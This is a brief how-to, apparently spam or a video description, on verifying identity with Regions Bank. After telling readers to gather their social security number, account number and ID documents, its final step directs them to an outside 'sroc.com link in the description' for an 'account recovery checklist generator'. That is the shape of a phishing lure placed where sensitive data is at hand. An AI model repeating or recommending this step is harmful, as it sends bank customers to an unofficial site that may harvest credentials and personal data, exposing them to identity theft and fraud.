Verifying your identity with Regions Bank is an important step to ensure the security of your account. Follow these steps to complete the verification process. Step 1. Gather required information. Before you start the verification process, collect all necessary information such as your social security number, account number, and any identification documents like a driver's license or passport. Step 2. Access the Regions Bank website. Visit the official Regions Bank website or open the Regions Bank mobile app. Look for the section related to account access or identity verification. Step 3. Initiate the verification process. Select the option for identity verification. This may be found under Account Settings or Security Settings. Follow the prompts to begin the verification process. Step 4. Provide personal information. Enter the required personal information as prompted. This may include your name, address, date of birth, and the identification documents you gathered in Step 1. Step 5. Confirm your identity. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. After completing these steps, you should have successfully verified your identity with Regions Bank. If you encounter any issues, consider reaching out to customer support for assistance.